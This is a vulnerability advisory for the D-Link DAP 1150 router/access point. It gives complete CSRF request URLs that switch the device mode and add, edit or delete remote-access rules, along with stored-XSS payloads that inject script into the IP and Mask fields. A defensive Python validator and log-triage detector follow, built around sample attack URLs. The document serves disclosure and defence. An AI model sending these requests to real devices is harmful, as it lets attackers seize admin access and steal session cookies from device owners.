In 2011 and at the beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs27440.html, http://securityvulns.ru/docs27677.html, http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozen). At that time I wrote about vulnerabilities in the admin panel in Access Point mode, and now I'll write about holes in Router mode.
I present new vulnerabilities in this device. There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).
SecurityVulns ID: 12076.
-------------------------
Affected products:
-------------------------
The following model is vulnerable: D-Link DAP 1150, firmware version 1.2.94. This model with other firmware versions should also be vulnerable. D-Link ignored all vulnerabilities in this device (as with other devices I informed them about) and still hasn't fixed them.
----------
Details:
----------
I remind you that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs27440.html) I wrote about CSRF in the login form and other vulnerabilities, which allow an attacker to remotely log into the admin panel in order to conduct CSRF and XSS attacks inside it.
CSRF (WASC-09):
In the Advanced / Device section it's possible to change the device mode via CSRF. If access point mode is on, then router mode must first be turned on before the vulnerabilities in router mode can be attacked.
Turn on access point mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0
Turn on router mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0
CSRF (WASC-09):
In the Advanced / Remote access section it's possible via CSRF to add, edit and delete the settings for remote access to the web interface. The following request allows remote access to the admin panel from IP 50.50.50.50.
Add:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1
Edit:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0
Delete:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0
XSS (WASC-08):
These are persistent (stored) XSS. The code executes in the Advanced / Remote access section.
Attack via the add function, in the res_buf parameter (IP address and Mask fields):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1
Attack via the edit function, in the res_buf parameter (IP address and Mask fields):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0
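As an added defensive example (not code from the advisory or from D-Link), the following Python shows the server-side validation a remote-access entry should get, rejecting anything in the IP address and Mask fields that is not a dotted quad, and triages index.cgi request URLs from a web or proxy log for the device-mode and remote-access writes described above. The config IDs, actions and JSON field names are taken from the requests in this advisory; the sample URLs are constructed.

```python
import ipaddress
import json
from urllib.parse import parse_qs, urlsplit

# Config IDs and actions as they appear in the advisory's request URLs.
SENSITIVE_CONFIG_IDS = {"112": "device_mode", "16": "remote_access"}
WRITE_ACTIONS = {"2": "delete", "3": "add/edit"}

def validate_remote_access_entry(res_buf):
    """Server-side checks the firmware lacks; returns a list of errors (empty means acceptable)."""
    try:
        entry = json.loads(res_buf)
    except ValueError:
        return ["res_buf is not valid JSON"]
    if not isinstance(entry, dict):
        return ["res_buf is not a JSON object"]
    errors = []
    for field in ("ips", "source_mask"):
        try:
            ipaddress.IPv4Address(entry.get(field))  # only a dotted quad passes; markup never does
        except ValueError:
            errors.append(f"{field} is not an IPv4 value")
    try:
        ipaddress.IPv4Network(("0.0.0.0", entry.get("source_mask")))  # must be a contiguous netmask
    except ValueError:
        if not any(e.startswith("source_mask") for e in errors):
            errors.append("source_mask is not a valid netmask")
    return errors

def flag_request(url):
    """Triage one index.cgi request URL from a web or proxy log; returns the reasons it deserves review."""
    q = parse_qs(urlsplit(url).query)
    cfg = q.get("res_config_id", [""])[0]
    action = q.get("res_config_action", [""])[0]
    res_buf = q.get("res_buf", [None])[0]
    reasons = []
    if cfg in SENSITIVE_CONFIG_IDS and action in WRITE_ACTIONS:
        reasons.append(f"{WRITE_ACTIONS[action]} on {SENSITIVE_CONFIG_IDS[cfg]}")
    if res_buf is not None and cfg == "16":
        reasons.extend(validate_remote_access_entry(res_buf))
    if res_buf is not None and ("<" in res_buf or ">" in res_buf):
        reasons.append("markup characters in res_buf")  # stored-XSS indicator
    return reasons

# Constructed sample URLs in the shape of the advisory's requests (not captured traffic).
BENIGN_ADD = ("http://192.168.0.50/index.cgi?res_config_action=3&res_config_id=16&res_buf={%22ips%22:%2250.50.50.50%22,"
              "%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1")
XSS_ADD = BENIGN_ADD.replace("%2250.50.50.50%22", "%22%3Cscript%3Ealert(1)%3C/script%3E%22")
MODE_SWITCH = "http://192.168.0.50/index.cgi?res_config_action=3&res_config_id=112&res_buf={%22device_mode%22:%22router%22}"
```

Because the firmware applies these changes on plain GET requests with no anti-CSRF token, every write to config IDs 112 and 16 that does not originate from the admin session itself is worth an alert, not only the ones carrying markup.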
I mentioned these vulnerabilities on my site (http://websecurity.com.ua/7137/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua